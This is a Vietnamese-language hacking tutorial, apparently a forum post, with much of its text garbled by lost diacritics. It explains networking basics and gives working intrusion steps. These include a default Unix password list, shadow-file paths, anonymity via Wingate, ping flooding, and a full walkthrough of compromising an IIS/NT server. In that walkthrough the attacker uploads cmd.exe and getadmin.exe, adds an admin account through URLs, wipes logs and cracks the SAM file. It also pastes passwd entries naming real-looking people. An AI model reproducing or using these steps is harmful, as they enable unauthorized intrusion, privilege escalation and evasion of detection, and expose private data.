become hacker

8/14/2019 Become Hacker

1/41

Nhng hiu bit c bn nht tr thnh Hacker - Phn 1

Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ? Nhng cc bn qun mt mt iu l cc bn cn phI c kin thc mt cch tng qut , hiu cc

thut ng m nhng ngi rnh v mng hay s dng . Ring ti th cha tht gii baonhiu nhng qua nghin cu ti cng tng hp c mt s kin thc c bn , munchia s cho tt c cc bn , nhm cng cc bn hc hi . Ti s khng chu trch nhimnu cc bn dng n quy ph ngI khc . Cc bn c th copy hoc post trong cctrang Web khc nhng hy in tin tc gi dI bi , tn trng bi vit ny cngchnh l tn trng ti v cng sc ca ti , ng thI cng tn trng chnh bn thn ccbn . Trong ny ti cng c chn thm mt s cch hack , ***** v v d cn bn , ccbn c th ng dng th v nghin cu c n hiu thm , r khi bt gp mt t mcc bn khng hiu th hy c bi ny bit , trong ny ti c s dng mt s cabi vit m ti thy rt hay t trang Web ca HVA , v cc trang Web khc m ti tng gh thm . Xin cm n nhng tc gi vit nhng bi y . By gi l vn chnh

.================================================== = =

1 . ) Ta cn nhng g bt u ?

C th nhiu bn khng ng vi ti nhng cch tt nht thc tp l cc bn hy dngHH Window 9X , rI n cc ci khc mnh hn l Linux hoc Unix , dI y l nhngci bn cn c :+ Mt ci OS ( c th l DOS , Window 9X , Linux , Unit .)+ Mt ci trang Web tt ( HVA chng hn hi`hi` greenbiggrin.gif greenbiggrin.gif )+ Mt b trnh duyt mng tt ( l Nescape , IE , nhng tt nht c l l Gozzila )+ Mt cng c chat tt ( mIRC ,Yahoo Mass ..)+ Telnet ( hoc nhng ci tng t nh nmap )+ Ci quan trng nht m bt c ai mun tr thnh mt hacker l u phI c mt cht kinthc vlp trnh ( C , C++ , Visual Basic , Pert ..)

2 . ) Th no l mt a ch IP ?

_ a ch IP c chia thnh 4 s gii hn t 0 - 255. Mi s c lu bi 1 byte - > !P ckicks thc l 4byte, c chia thnh cc lp a ch. C 3 lp l A, B, v C. Nu lp A, tas c th c 16 triu i ch, lp B c 65536 a ch. V d: lp B vi 132.25,chng ta ctt c cc a ch t 132.25.0.0 n 132.25.255.255. Phn ln cc a ch lp A ll s huca cc cng ty hay ca t chc. Mt ISP thng s hu mt vi a ch lp B hoc C. V d:

Nu a ch IP ca bn l 132.25.23.24 th bn c th xc nh ISP ca bn l ai. ( c IP l132.25.x.)

_ IP l t vit tt ca Internet Protocol, trn Internet th a ch IP ca mI ngi l duy nhtv n s I din cho chnh ngI , a ch IP c s dng bi cc my tnh khc nhau nhn bit cc my tnh kt ni gia chng. y l l do ti sao bn li b IRC cm, v l cchngi ta tm ra IP ca bn.a ch IP c th d dng pht hin ra, ngi ta c th ly c qua cc cch sau :+ bn lt qua mt trang web, IP ca bn b ghi li+ trn IRC, bt k ai cng c th c IP ca bn+ trn ICQ, mi ngi c th bit IP ca bn, thm ch bn chn ``do not show ip`` ngi ta

vn ly c n+ nu bn kt ni vi mt ai , h c th g ``systat n ``, v bit c ai ang kt ni nh
http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32


2/41

+ nu ai gi cho bn mt email vi mt on m java tm IP, h cng c th tm c IPca bn( Ti liu ca HVA )

3 . ) Lm th no bit c a ch IP ca mnh ?

Run nh lnh winipcfg ._ Trong Window : vo Start_ Trong mIRC : kt nI n my ch sau nh lnh /dns _ Thng qua mt s trang Web c hin th IP .

4 . ) IP Spoofing l g ?

_ Mt s IP c mc ch xc nh mt thit b duy nht trn th gii. V vy trn mng mtmy ch c th cho php mt thit b khc trao i d liu qua li m khng cn kim tra mych.Tuy nhin c th thay i IP ca bn, ngha l bn c th gi mt thng tin gi n mt mykhc m my s tin rng thng tin nhn c xut pht t mt my no (tt nhin l

khng phi my ca bn). Bn c th vt qua my ch m khng cn phi c quyn iukhin my ch . iu tr ngi l ch nhng thng tin phn hi t my ch s c gin thit b c IP m chng ta gi mo. V vy c th bn s khng c c s phn hinhng thng tin m mnh mong mun. C l iu duy nht m spoof IP c hiu qu l khi bncn vt qua firewall, trm account v cn du thng tin c nhn!( Ti liu ca HVA )

5 . ) Trojan / worm / virus / logicbomb l ci g ?

_ Trojan : Ni cho d hiu th y l chng trnh ip vin c ci vo my ca ngI khc n cp nhng ti liu trn my gI v cho ch nhn ca n , Ci m n n cp c th lmt khu , accourt , hay cookie . tu theo mun ca ngI ci n .

_ virus : Ni cho d hiu th y l chng trnh vI nhng m c bit c ci ( hoc lylan t my khc ) ln my ca nn nhn v thc hin nhng yu cu ca m , a s virutc s dng ph hoI d liu hoc ph hoI my tnh .

_ worm : y l chng trnh c lp c th t nhn bn bn thn n v ly lan khp bntrong mng .Cng ging nh Virut , n cng c th ph hoI d liu , hoc n c th ph hoI

bn trong mng , nhiu khi cn lm down c mang ._ logicbomb : L chng trnh gi mt lc nhiu gi d liu cho cng mt a ch , lm ngplt h thng , tt nghn ng truyn ( trn server) hoc dng lm cng c khng b I

phng ( bom Mail ) .

6 . ) PGP l g ?

_ PGP l vit tt ca t Pretty Good Privacy , y l cng c s dng s m ho cha khocng cng bo v nhng h s Email v d liu , l dng m ho an ton cao s dng phnmm cho MS_DOS , Unix , VAX/VMS v cho nhng dng khc .

7 . ) Proxy l g ?

_Proxy cung cp cho ngi s dng truy xut internet vi nhng hostn. Nhng proxyserverphc v nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trndual_homedhost hoc basionhost. Nhng chng trnh client ca ngi s dung s qua trunggian proxy serverthay th cho server tht s m ngi s dng cn giao tip. Proxy server

xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu yu cu cp ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip nnhng yu cu t clientn server, cng nh p ng nhng yu cu ca server n client. V
http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32


3/41

vy proxy server ging cu ni trung gian gia server v client ._ Proxy cho user truy xut dch v trn internet theo ngha trc tip. Vi dual host homed cnphi login vo host trc khi s dng dch v no trn internet. iu ny thng khng tinli, v mt s ngi tr nn tht vng khi h c cm gic thng qua firewall, vi proxy ngii quyt c vn ny. Tt nhin n cn c nhng giao thc mi nhng ni chung ncng kh tin li cho user. Bi v proxy cho php user truy xut nhng dch v trn internet t

h thng c nhn ca h, v vy n khng cho php packet i trc tip gia h thng s dngv internet. ng i l ging tip thng qua dual homed host hoc thng qua s kt hp giabastion host v screening rounter.

( Bi vit ca Z3RON3 ti liu ca HVA )

8 . ) Unix l g ?

_ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnh nht , v thnthit vi cc Hacker nht . Nu bn tr thnh mt hacker tht s th HH ny khng ththiu i vI bn . N c s dng h tr cho lp trnh ngn ng C .

9 . ) Telnet l g ?

_ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua cng ( port ) . MImy tnh hoc my ch ( server ) u c cng , sau y l mt s cng thng dng :+ Port 21: FTP+ Port 23: Telnet+ Port 25: SMTP (Mail)+ Port 37: Time+ Port 43: Whois

_ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 .

10 . ) Lm th no bit mnh Telnet n h thng Unix ?_ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn kt niti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du nhc : Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix c ngoI tr chng xuthin thng bo trc ch log in : nh v d : Welcome to SHUnix. Please log in .)By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mtaccount thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account vo , bn sthy c mt mt khu , bn hy th nhp Default Password th theo bng sau :

Account-------------------------Default Password

Root----------------------------------------------- RootSys------------------------------------------------ Sys / System / BinBin------------------------------------------------ -Sys / BinMountfsy------------------------------------------M ountfsys

Nuuc----------------------------------------------- AnonAnon----------------------------------------------- AnonUser----------------------------------------------- -UserGames---------------------------------------------G amesInstall-------------------------------------------- --InstallDemo----------------------------------------------- Demo

Guest---------------------------------------------- Guest
http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=10&script=showthread&forumid=32


4/41

11 . ) shell account l ci g ?

_ Mt shell account cho php bn s dng my tnh nh bn nh thit b u cuI ( terminal) m vI n bn c th nh lnh n mt my tnh ang chy Unix , Shell l chng trnhc nhim v dch nhng k t ca bn gi n rI a vo thc hin lnh ca chng trnhUnix . VI mt shell account chnh xc bn c th s dng c mt trm lm vic mnh hn

nhiu so vI ci m bn c th tng tng n c .Bn c th ly c shell account min ph tI trang Web www.freeshell.com tuy nhin bns khng s dng c telnet cho n khi bn tr tin cho n .

12 . ) Lm cch no bn c th Crack Unix account passwords ?

_ Rt n gin , tuy nhin cch m ti ni vI cc bn y lc hu rI , cc bn c thcrack c chng nu cc bn may mn , cn khng th cc bn c tham kho .

_ u tin bn hy ng nhp vo h thng c s dng Unix nh mt khch hng hoc mtngI khch gh thm , nu may mn bn s ly c mt khu c ct du trong nhng hthng chun nh :

/etc/passwd

mi hng trong mt h s passwd c mt ti khon khc nhau , n ging nh hng ny :

userid:password:userid#:groupid#:GECOS field:home dir:shell

trong :+ userid = the user id name : tn ng nhp : c th l mt tn hoc mt s .+ password : mt m . Dng lm g hn cc bn cng bit rI .+ userid# : l mt s duy nht c thng bo cho ngI ng k khi h ng k mI lnu tin .+ groupid# : tng t nh userid# , nhng n c dng cho nhng ngI ang trong nhmno ( nh nhm Hunter Buq ca HVA chng hn )+ GECOS FIELD : y l ni cha thng tin cho ngI s dng , trong c h tn y ,s in thoi , a ch v.v. . y cng l ngun tt ta d dng ***** mt mt khu .+ home dir : l th mc ghi lI hot ng ca ngi khch khi h gh thm ( ging nh mcHistory trong IE vy )+ Shell : y l tn ca shell m n t ng bt u khi ta login .

_ Hy ly file password , ly file text m ho v , sau bn dng chng trnh``CrackerJack`` hoc ``John the Ripper`` ***** .

_ Cc bn thy cng kh d phI khng ? Sai bt , khng d dng v may mn bn c th***** c v hu ht by gi h ct rt k , hy c tip bn s thy kh khn ch no .

13 . ) shadowed password l ci g ?

_ Mt shadowed password c bit n l trong file Unix passwd , khi bn nhp mt mtkhu , th ngI khc ch thy c trnh n ca n ( nh k hiu X hoc * ) . Ci nythng bo cho bn bit l file passwd c ct gi ni khc , ni m mt ngI s dng

bnh thng khng th n c . Khng l ta nh b tay , d nhin l I vI mt hacker thkhng ri , ta khng n c trc tip file shadowed password th ta hy tm file sao lu can , l file Unshadowed .

Nhng file ny trn h thng ca Unix khng c nh , bn hy th vI ln lt nhng ngdn sau :

CODEAIX 3 /etc/security/passwd !
http://www.freeshell.com/http://www.freeshell.com/http://www.freeshell.com/http://www.freeshell.com/


5/41

or /tcb/auth/files/ /A/UX 3.0s /tcb/files/auth/?/ *BSD4.3-Reno /etc/master.passwd *ConvexOS 10 /etc/shadpw *ConvexOS 11 /etc/shadow *DG/UX /etc/tcb/aa/user/ *

EP/IX /etc/shadow xHP-UX /.secure/etc/passwd *IRIX 5 /etc/shadow xLinux 1.1 /etc/shadow *OSF/1 /etc/passwd[.dir|.pag] *SCO Unix #.2.x /tcb/auth/files/ /SunOS4.1+c2 /etc/security/passwd.adjunct =##usernameSunOS 5.0 /etc/shadowmaps/tables/whatever >System V Release 4.0 /etc/shadow xSystem V Release 4.2 /etc/security/* databaseUltrix 4 /etc/auth[.dir|.pag] *UNICOS /etc/udb =20

Trc du / u tin ca mt hng l tn ca h thng tng ng , hy cn c vo h thngtht s bn mun ly rI ln theo ng dn pha sau du /u tin .V cuI cng l nhng account passwd m ti tng ***** c , c th by gi n hthiu lc rI :

CODEarif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksharigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksharisto:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksharmando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksharn:x:1582:1000:Arn mett:/udd/arn:/bin/ksharne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksharoon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksharozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/basharranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

bo m s b mt nn pass ca h ti xo i v vo l k hiu x , cc bn hytm hiu thng tin c c t chng xem .

Ht phn 1

Tc gi:Anhdenday


14 . ) Vitual port l g ?

_ Vitual port ( cng o ) l 1 s t nhin c gi trong TCP(Tranmission Control Protocol)v UDP(User Diagram Protocol) header. Nh mi ngui bit, Windows c th chy nhiu


6/41

chng trnh 1 lc, mi chng trnh ny c 1 cng ring dng truyn v nhn d liu. Vd 1 my c a ch IP l 127.0.0.1 chy WebServer, FTP_Server, POP3 server, etc, nhngdch v ny u uc chy trn 1 IP address l 127.0.0.1, khi mt gi tin uc gi n lm thno my tnh ca chng ta phn bit c gi tin ny i vo dch v no WebServer hay FTPserverhay SM! TP? Chnh v th Port xut hin. Mi dch v c 1 s port mc nh, v d FTPc port mc nh l 21, web service c port mc nh l 80, POP3 l 110, SMTP l 25 vn

vn....Ngi qun tr mng c th thay i s port mc nh ny, nu bn ko bit s port trn mtmy ch, bn ko th kt ni vo dch v c. Chc bn tng nghe ni n PORTMAPPING nhng c l cha bit n l g v chc nng th no. Port mapping thc ra ngin ch l qu trnh chuyn i s port mc nh ca mt dch v no n 1 s khc. V dPort mc nh ca WebServer l 80, nhng thnh thong c l bn vn thyhttp://www.xxx.com:8080 , 8080 y chnh l s port cahost xxx nhng uc nguiqun tr ca host ny ``map`` t 80 thnh 8080.

( Ti liu ca HVA )

15 . ) DNS l g ?

_ DNS l vit tt ca Domain Name System. Mt my ch DNS i kt ni cng s 53, cngha l nu bn mun kt ni vo my ch , bn phi kt ni n cng s 53. My chchy DNS chuyn hostname bng cc ch ci thnh cc ch s tng ng v ngc li. Vd: 127.0.0.1 -- > localhost v localhost--- > 127.0.0.1 .

( Ti liu ca HVA )

16 . ) i iu v Wingate :

_ WinGate l mt chng trnh n gin cho php bn chia cc kt ni ra. Th d: bn c thchia s 1 modem vi 2 hoc nhiu my . WinGate dng vi nhiu proxy khc nhau c th chegiu bn .

_ Lm sao Wingate c th che du bn ? Hy lm theo ti : Bn hy telnet trn cng 23trn my ch chy WinGate telnet proxy v bn s c du nhc WinGate > . Ti du nhc ny

bn nh vo tn server, cng mt khong trng v cng bn mun kt ni vo. VD :

CODEtelnet wingate.netWinGate > victim.com 23

ta telnet n cng 23 v y l cng mc nh khi bn ci Wingate . lc ny IP trn my mvictim chp c ca ta l IP ca my ch cha Wingate proxy .

_ Lm sao tm Wingate ?+ Nu bn mun tm IP WinGates tnh (IP khng i) th n yahoo hay mt trang tm kimcable modem. Tm kim cable modems v nhiu ngi dng cable modems c WinGate hc th chia s ng truyn rng ca n cable modems cho nhng my khc trong cng mtnh . Hoc bn c th dng Port hay Domain scanners v scan Port 1080 .+ tm IP ng (IP thay i mi ln user kt ni vo internet) ca WinGates bn c thdng Domscan hoc cc chng trnh qut khc . Nu dng Domscan bn hy nhp khongIP bt k vo box u tin v s 23 vo box th 2 . Khi c kt qu , bn hy th ln lt

telnet n cc a ch IP tm c ( hng dn trn ), nu n xut hin du Wingate > th bn tm ng my ang s dng Wingate rI .+ Theo kinh nghim ca ti th bn hy down wingatescanner v m si , n c rt nhiu trn
http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.xxx.com:8080/http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.xxx.com:8080/http://www.xxx.com:8080/http://www.xxx.com:8080/http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=1&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32


7/41

mng .

17 . ) i iu v Traceroute :

_ Traceroute l mt chng trnh cho php bn xc nh c ng i ca cc gi packets tmy bn n h thng ch trn mng Internet.

_ bn hy xem VD sau :CODEC:\windows > tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Ti cn bit ng i t my ti n mt host trn mng Internet c a ch ip l203.94.12.54. Ti cn phi tracert n n! Nh bn thy trn, cc gi packets t my timun n c 203.94.12.54 phi i qua 13 hops(mc xch) trn mng. y l ng i cacc gi packets .

_ Bn hy xem VD tip theo :

CODEhost2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets1 isp.net (202.xy.34.12) 20ms 10ms 10ms2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ Dng u tin cho bit hostname v a ch IP ca h thng ch. Dng ny cn cho chngta bit thm gi tr TTL


8/41

_Ch :Trong windows: tracert hostnameTrong unix: traceroute hostname

( Ti liu ca viethacker.net )

18 . ) Ping v cch s dng : _ Ping l 1 khi nim rt n gin tuy nhin rt hu ch cho vic chn on mng. Tiu s cat ``ping`` nh sau: Ping l ting ng vang ra khi 1 tu ngm mun bit c 1 vt th khc gn mnh hay ko, nu c 1 vt th no gn tu ngm ting sng m ny s va vo vt th v ting vang li s l ``pong`` vy th tu ngm s bit l c g gn mnh.

_Trn Internet, khi nim Ping cng rt ging vi tiu s ca n nh cp trn. LnhPing gi mt gi ICMP (Internet Control Message Protocol) n host, nu host ``pong`` lic ngha l host tn ti (hoc l c th vi ti oc). Ping cng c th gip chng ta bitc lung thi gian mt gi tin (data packet) i t my tnh ca mnh n 1 host no .

_Ping tht d dng, ch cn m MS-DOS, v g ``ping a_ch_ip``, mc nh s ping 4 ln,nhng bn cng c th g

CODE``ping ip.address -t``

Cch ny s lm my ping mi. thay i kch thc ping lm nh sau:

CODE``ping -l (size) a_ch_ip ``

Ci ping lm l gi mt gi tin n mt my tnh, sau xem xem mt bao lu gi tin ri xemxem sau bao lu gi tin quay tr li, cch ny xc nh c tc ca kt ni, v thigian cn mt gi tin i v quay tr li v chia bn (gi l ``trip time``). Ping cng c thc dng lm chm i hoc v h thng bng lt ping. Windows 98 treo sau mt phtlt ping (B m ca kt ni b trn c qua nhiu kt ni, nn Windows quyt nh cho ni ngh mt cht). Mt cuc tn cng ping flood s chim rt nhiu bng thng ca bn, v

bn phi c bng thng ln hn i phng ( tr khi i phng l mt my chy Windows98 v bn c mt modem trung bnh, bng cch bn s h gc i phng sau xp x mt

pht lt ping). Lt Ping khng hiu qu lm i vi nhng i phng mnh hn mt cht.tr khi bn c nhiu ng v bn kim sot mt s lng tng i cc my ch cng pingm tng bng thng ln hn i phng.

Ch : option t ca DOS khng gy ra lt ping, n ch ping mc tiu mt cch lin tc, vinhng khong ngt qung gia hai ln ping lin tip. Trong tt c cc h Unix hoc Linux,

bn c th dng ping -f gy ra lt thc s. Thc t l phi ping -f nu bn dng mt bntng thch POSIX (POSIX - Portable Operating System Interface da trn uniX), nu khngn s khng phi l mt bn Unix/Linux thc s, bi vy nu bn dng mt h iu hnh mn t cho n l Unix hay Linux, n s c tham s -f.

( Ti liu ca HVA v viethacker.net )

19 . ) K thut xm nhp Window NT t mng Internet :

_ y l bi hc hack u tin m ti thc hnh khi bt u nghin cu v hack , by gi tis by li cho cc bn . bn s cn phI c mt s thI gian thc hin c n v n tuy dnhng kh . Ta s bt u :


9/41

_ u tin bn cn tm mt server chy IIS :_ Tip n bn vo DOS v nh ` FTP `. VD :

c:\Ftp www.dodgyinc.com

( trang na khi ti thc hnh th vn cn lm c , by gi khng bit h fix cha , nu

bn no c trang no khc th hy post ln cho mI ngI cng lm nh )Nu connect thnh cng , bn s thy mt s dng tng t nh th ny :

CODEConnected to www.dodgyinc.com.220 Vdodgy Microsoft FTP Service (Version 3.0).

User (www.dodgyinc.com none)):

Ci m ta thy trn c cha nhng thng tin rt quan trng , n cho ta bit tn Netbios camy tnh l Vdodgy . T iu ny bn c th suy din ra tn m c s dng cho NT

cho php ta c th khai thc , mc nh m dch v FTP gn cho n nu n cha i tn s lIUSR_VDODGY . Hy nh ly v n s c ch cho ta . Nhp ``anonymous trong user ns xut hin dng sau :

CODE331 Anonymous access allowed, send identity (e-mail name) as password.Password:

By gi passwd s l bt c g m ta cha bit , tuy nhin , bn hy th nh vo passwd lanonymous . Nu n sai , bn hy log in lI thit b FTP , bn hy nh l khi ta quay lI ln

ny th khng s dng cch mo danh na ( anonymous ) m s dng `Guest , th lipasswd vi guest xem th no .By gi bn hy nh lnh trong DOS :

CODECd /c

V s nhn thy kt qu nu nh bn xm nhp thnh cng , by gi bn hy nhanh chngtm th mc `cgi-bin` . Nu nh bn may mn , bn s tm c d dng v thng thng hthng qun l t `cgi-bin` vo ni m ta va xm nhp cho cc ngI qun l h d

dng iu khin mng hn . th mc cgi-bin c th cha cc chng trnh m bn c th lidng n chy t trnh duyt Web ca bn . Ta hy bt u quy no greenbiggrin.gifgreenbiggrin.gif .

_ u tin , bn hy chuyn t th mc cgi-bin v s dng lnh Binary ( c th cc bnkhng cn dng lnh ny ) , sau bn dnh tip lnh put cmd.exe . Tip theo l bn cn cfile hack ci vo th mc ny , hy tm trn mng ly 2 file quan trng nht l`getadmin.exe` v `gasys.dll` . Download chng xung , mt khi bn c n hy ci votrong th mc cgi-bin . Ok , coi nh mI vic xong , bn hy ng ca s DOS .By gi bn hy nh a ch sau ln trnh duyt ca bn :

http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY

Sau vi giy bn s c c cu tr li nh dI y :

CODE
http://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGYhttp://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGYhttp://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGYhttp://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY


10/41

CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers.The headers it did return are:Congratulations , now account IUSR_VDODGY have administrator rights!

Th l bn mo danh admin xm nhp h thng , vic cn thit by gi l bn hy t tocho mnh mt account , hy nh dng sau trn IE :

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add

dng lnh trn s to cho bn mt account login vi user : anhdenday v passwd :toilahackerBy gi bn hy l cho user ny c account ca admin , bn ch cn nh ln IElnh :

http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday

Vy l xong ri , bn hy disconnect v n start menu - > find ri search computer`www.dodgyinc.com`. Khi tm thy , bn vo explore , explore NT s m ra bn hay nhpuser v passwd m n ( ca ti l user : anhdenday v passwd : toilahacker ) .

C mt vn l khi bn xm nhp h thng ny th s b ghi li , do xo du vt bnhy vo `Winnt\system32\logfiles` m file log rI xo nhng thng tin lin quan n bn ,rI save chng . Nu bn mun ly mt thng bo g v vic chia s s xm nhp th bn hythay i ngy thng trn my tnh vI URL sau :

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03

xong rI bn hy xo file `getadmin.exe`, v `gasys.dll` t `cgi-bin` . Mc ch khi ta xmnhp h thng ny l chm pass ca admin ln sau xm nhp mt cch hp l , do bnhy tm file SAM ( cha pass ca admin v member ) trong h thng rI dng chng trnhl0pht ***** ***** pass ( Hng dn v cch s dng l0pht ***** v 3.02 ti postln ri ,cc bn hy t nghin cu nh ) . y l link : http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=Khi ***** xong cc bn c user v pass ca admin rI , by gi hy xo account ca user (ca ti l anhdenday ) i cho an ton . Bn c th lm g trong h thng l tu thch ,nhng cc bn ng xo ht ti liu ca h nh , ti cho h lm .Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny , ti my mmt c 4 gi , nu nh bn quen th ln th 2 bn s mt t thI gian hn .

phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v ca mt Web site , vlm th no hack mt trang web n gin nht .v.v

Ht phn 2

AnhdendayHVA


20 . ) Cookie l g ?

_ Cookie l nhng phn d liu nh c cu trc c chia s gia web site v browser ca
http://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-bin/gehttp://www.dodgyinc.com/cgi-bin/gehttp://www.dodgyinc.com/cgi-bin/cmhttp://vnhacker.org/forum/?act=ST&http://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-http://www.dodgyinc.com/cgi-bin/gehttp://www.dodgyinc.com/cgi-bin/gehttp://www.dodgyinc.com/cgi-bin/gehttp://www.dodgyinc.com/cgi-bin/cmhttp://www.dodgyinc.com/cgi-bin/cmhttp://www.dodgyinc.com/cgi-bin/cmhttp://vnhacker.org/forum/?act=ST&http://vnhacker.org/forum/?act=ST&http://vnhacker.org/forum/?act=ST&


11/41

ngi dng. cookies c lu tr di nhng file d liu nh dng text (size di 4k). Chngc cc site to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm sitev nhng vng m h i qua trong site.

Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thiquen...Cookie c browser ca ngi dng chp nhn lu trn a cng ca my mnh, ko

phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thng tin v ngi

dng c lu tr trong cookie. nhng ln truy cp sau n site , web site c th dng linhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo 1 forum...) mngi ko phi lm li thao tc ng nhp hay phi nhp li cc thng tin khc. Vn t ral c nhiu site qun l vic dng li cc thng tin lu trong cookie ko chnh xc, kim tra koy hoc m ho cc thng tin trong cookie cn s h gip cho hacker khai thc vtqua cnh ca ng nhp, ot quyn iu khin site .

_ Cookies thng c cc thnh phn sau :

